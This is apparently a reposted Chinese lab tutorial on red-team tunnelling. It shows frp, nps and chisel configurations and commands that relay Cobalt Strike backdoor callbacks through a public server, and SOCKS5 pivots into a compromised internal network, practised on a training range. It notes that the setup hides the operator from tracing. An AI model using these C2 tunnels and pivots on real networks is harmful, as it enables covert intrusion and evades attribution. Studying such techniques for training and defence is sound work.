隧道技术篇2frp代理nps代理shisel代理

FRP代理

1.实现湖北内网控制北京的内网C2上线 2.实现湖北内网探针北京内网 信息收集 (socks建立和端口映射)

1.连接47.98.210.85 7000端口服务端 2.尝试将服务端的6666转到127.0.0.1 5555采用tcp协议,备注名proxies

serverAddr="47.98.210.85"
serverPort=7000[[proxies]]
name="test-tcp"
type="tcp"
localIP="127.0.0.1"
localPort=5555
remotePort=6666

如何利用这种情况实现c2上线 监听器1:47.98.210.85 6666端口 监听器2:192.168.139.141 5555端口 生成后门用监听器1 原理就是把内网中的192.168.139.141端口流量转发到47.98.210.85的6666端口上,我们就可以通过47.98.210.85的6666上线了

后门->47.98.210.85:6666->frp 192.168.139.141 5555->监听器2->正常上线

如下示例 下图中的47.98.210.85是公网服务器ip地址

如下的192.168.139.141是c2的ip地址

我们生成后门要使用公网ip的后门来生成,因为目标主机是内网,只可以访问到公网的ip地址47.98.210.85的6666

当我们的后门攻击内网机器,然后内网机器回去连接公网服务器,然后公网服务器存在ftps服务,kali客户端连接的时候会吧公网服务器的6666转换为本地的5555,然后cs监听本地的5555,所以就可以上线了

我们来通过实验说明一下 1.在本地kali上开启cs服务,然后客户端连接

2.在kali上运行frpc来配置如上,把远程服务端的6666端口转换为本地的5555端口

serverAddr="47.98.210.85"
serverPort=7000[[proxies]]
name="test-tcp"
type="tcp"
localIP="127.0.0.1"
localPort=5555
remotePort=6666

本地kali配置

公网服务器配置

这里我本地一直配置不成功,最后我改了一下服务端的7000端口为7001,可能是端口冲突了

3.使用cs建立监听器 先建立一个反向链接公网服务器6666端口的监听器,让客户端连接公网服务器

然后建立一个监听器来监听本地的5555端口,因为frp把公网的6666代理到了本地的5555端口

然后创建一个后门,后门是使用第一个监听器,通过内网主机去连接公网服务器,然后公网服务器通过frp转发到本地

然后通过在目标内网执行后门,成功上线到了c2服务器

这个好处就是红队在朔源的时候,他找不到我,可以隐藏我自己的身份 通过frp来端口转发流量

内网穿透来访问内网 1.在目标内网的windows建立frp的客户端,然后frps建立在公网服务器中

frps配置如下

frpc配置如下

然后在本地配置proxychain代理去访问内网服务器

就是下图中的账号密码

最终我可以去访问和192.168.198.130,因为应该和这个192.168.198.130通往段的ip地址也可以访问,因为192.168.198.130这个ip可以上网,和47.105.65.102互通,其他的主机192.168.52.0/24这个网段访问不通,因为是用红日靶场做的实验,红日中器它机器和的网卡用的是仅主机模式没有网关,也就是没有路由,所以不通

端口映射和socks5代理方向不同,socks5是外部流量进入,而端口映射是本地流量映射出去,是我发送出去

NPS代理

nps是一款轻量级,高性能,功能强大的内网穿透代理服务器,目前支持udp,tcp流量转发,可支持任何tcp,udp上层协议访问内网网站本地支付接口,ssh访问,远程桌面,dns解析等,此外还支持内网http代理,外网socks5代理,p2p等,并带有功能强大的web管理端

1.下载nps,然后上传到服务端口,直接运行,然后访问服务端的ip地址加端口8080

通过默认账号admin和默认密码123登录

客户端连接之后,点击隧道

然后新增

填写如下,将服务器的6666转发到内网的5555端口,就是转发到执行刚才客户端命令的5555端口

然后和之前一样使用两个监听器,一个监听器是6666的公网服务器端口,一个是本地的5555端口,kali机做攻击机的的话就可以通过隧道建立连接了

socks代理 1.在nps中建立socks代理,如下配置

2.新增,然后选择socks代理

3.然后配置客户端,客户端在目标主机上面建立,也就是被攻击的内网主机 4.在kali机器上使用代理,然后访问内网,继续内网渗透

shisel代理

内网穿透c2上线

建立服务器监听1234
./chisel server -p 1234 --reverse
建立客户端连接服务端后将141主机的5555给到服务端6666上
./shisel client -v 47.98.210.85:1234 R:0.0.0.0:6666:192.168.139.141:5555
后门请求6666,然后kali运行./shisel client -v 47.98.210.85:1234 R:0.0.0.0:6666:192.168.139.141:5555去6666转发给自己的5555,然后自己通过5555进行cs上线

内网穿透信息收集

1.建立socks节点
建立服务器监听1090
chisel server -p 1090 --socks5
2.建立客户端连接服务端将使用socks服务
chisel client 47.98.210.85:1090 socks &
3.使用kali通过服务器ip地址和1090端口进行代理,信息收集

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/diannao/89188.shtml
繁体地址,请注明出处:http://hk.pswp.cn/diannao/89188.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[Python 基础课程]PyCharm 的安装

Python 的编辑器目前主流的有 PyCharm 和 Vscode。 PyCharm 是 Python 目前最主流、最常用、最推荐的 Python 编辑器。 https://www.jetbrains.com/pycharm/ PyCharm 有社区版和专业版,可以根据自己的需要下载对应的版本。社区版是收费的,对于初学者或…

Spread Ribbon 工具栏控件:在WinForms中高效编辑Spread工作簿

引言 在数据密集型应用中,电子表格功能是提升用户体验的关键要素。GrapeCity Spread.NET V17 推出的独立 Ribbon工具栏控件,为WinForms开发者提供了与Excel高度一致的UI交互体验。通过集成此控件,用户可直观地进行数据编辑、格式调整等操作&…

leedcode:找到字符串中所有字母异位词

问题:给定两个字符串 s 和 p,找到 s 中所有 p 的 异位词 的子串,返回这些子串的起始索引。不考虑答案输出的顺序。 package com.text;import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map;…

华为云Flexus+DeepSeek征文|基于华为云 Flexus Dify平台开发AI Agent的详细流程

目录 一、Dify 应用开发平台 1.1 什么是 Dify? 1.2 Dify 平台优势 二、构建 AI Agent 2.1 创建智能客服助手 2.2 配置 LLM组件 三、访问智能应用 3.1 应用发布 3.2 智能对话 四、API 调用智能客服助手 4.1 配置 API 访问接口 4.2 调用智能客服助手API …

【知识图谱构建系列7】:结果评价(1)

文章目录 前言前情提要三元组提取结果评价脚本代码分析几分钟后前言 翻了一下记录,发现咱的知识图谱构建已经接近10天没有搞了。时间也是过得真快啊。但这毕竟是咱未来产生论文的主要阵地,所以得赶紧把节奏给拾起来哈~ 前情提要 我们已经可以在mistral模型的基础上,跑通提…

BT下载工具 qBittorrent v5.1.1.10,便携无广告,BT下载速度翻倍

[软件名称]: BT下载工具 qBittorrent v5.1.1.10 [软件大小]: 15.9 MB [下载通道]: 夸克盘 | 迅雷盘 软件介绍 🔥《qBittorrent增强版》v5.1.1.10便携版|BT下载神器,速度与隐私兼得🌐 ✨ 核心优势: ✅ 无视版权限制…

裂变与重构:2025年大模型生态全景透视及未来趋势研判

1. 2025上半年:大模型生态的裂变时刻 1.1 技术范式革命:从生成到推理的跨越 2025年1月DeepSeek的横空出世,标志着大模型正式进入"推理时代"。这款国产模型在发布首周即突破1亿用户量级,其核心突破在于将传统生成能力升…

【docker】如何正确拉取langgraph-api

加这些配置都没用 # 设置代理环境变量 export HTTP_PROXY=http://127.0.0.1:7890 export HTTPS_PROXY=http://127.0.0.1:7890 # 设置更长的超时时间 export DOCKER_CLIENT_TIMEOUT=

PIXHAWK(ardupilot4.52)上传航点的bug

起因是查看飞控日志时发现地面站上传的平行航线,在日志看到航线却并不是平行的。 然后对比了一下地面站上传的航点信息跟飞控读取到的航点信息 发现经纬度只有前几位能够对应上,后几位都对应不上,两个点之间相差了50公分。地面站工程师认为地…

车载ECU刷写文件格式汇总详解

我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 做到欲望极简,了解自己的真实欲望,不受外在潮流的影响,不盲从&#x…

Redis核心知识详解:从全局命令到高级数据结构

一、Redis全局命令详解 1.1 键查看与管理 dbsize:高效获取键总数(O(1)操作) 127.0.0.1:6379> dbsize (integer) 8 keys:生产环境避免使用(O(n)操作) # 查找user开头的键(不推荐生产使用…

【网络】Linux 内核优化实战 - net.ipv4.tcp_mem

目录 参数结构与含义与缓冲区大小参数的区别内存管理机制详解1. 内存使用状态与触发逻辑2. 与其他参数的协同关系 典型调整场景与配置示例场景 1:高并发低带宽服务(如 API 网关,数万连接但单连接流量小)场景 2:高带宽低…

插入排序的简单介绍

今天给大家简单介绍一下插入排序。 插入排序,其基本思想是将未排序的数据逐步插入到已排序序列中的合适位置,从而使整个序列逐渐有序。 下面我们看一个排序的过程(升序),给定一个int类型的数组,利用插入排…

docker搭建minio和python使用minio

1 准备工作 1.创建目录 [rootk8s-storage tmp]# mkdir -pv minio/{data,conf} mkdir: created directory ‘minio’ mkdir: created directory ‘minio/data’ mkdir: created directory ‘minio/conf’[rootk8s-storage minio]# chmod 777 -R *2.生成https证书 openssl req…

开源代码修复新标杆——月之暗面最新开源编程模型Kimi-Dev-72B本地部署教程,自博弈修复 Bug

一、介绍 Kimi-Dev-72B是由月之暗面(Moonshot AI)最新开源的AI编程模型,专为软件工程任务设计,并登顶 SWE-bench Verified 基准测试榜首,超越 DeepSeek-R1 等模型,成为当前开源代码模型的 SOTA&#xff1a…

微服务架构之基本设计原则

作为系统架构师,在进行架构设计时需要遵循一系列经过实践验证的核心原则,这些原则贯穿于需求分析、模块划分、技术选型和系统演进的全流程。以下从核心设计原则、架构特性原则、工程实践原则三个维度,结合具体案例展开说明: 一、…

Wpf布局之WrapPanel面板!

文章目录 前言一、引言二、使用步骤 前言 Wpf布局之WrapPanel面板! 一、引言 WrapPanel面板以一次一行或一列的方式布置控件! 二、使用步骤 WrapPanel面板Orientation属性默认是"Horizontal",将控件从左向右进行排列&#xff…

QEMU运行RISCV版Ubuntu

宿主机为ubuntu20.04,推荐ubuntu 20.04 risc-v版, 宿主机为ubuntu24.04,推荐ubuntu 24.04 risc-v版, 安装ubuntu 24.04 risc-v基本步骤: 1, sudo apt update sudo apt install opensbi qemu-system-misc…

【LeetCode 热题 100】239. 滑动窗口最大值——(解法一)滑动窗口+暴力解

Problem: 239. 滑动窗口最大值 题目:给你一个整数数组 nums,有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。你只可以看到在滑动窗口内的 k 个数字。滑动窗口每次只向右移动一位。返回滑动窗口中的最大值 。 文章目录 整体思路完整代码时空…

攻防世界-MISC-red_green

知识点 1.pngLSB隐写 步骤 方法一:zsteg 打开附件,是一张图片,打开看不懂(其实由两种颜色构成,0和1),用zsteg查看,发现隐写了一张jpg图片,使用zsteg提取。打开jpg图片…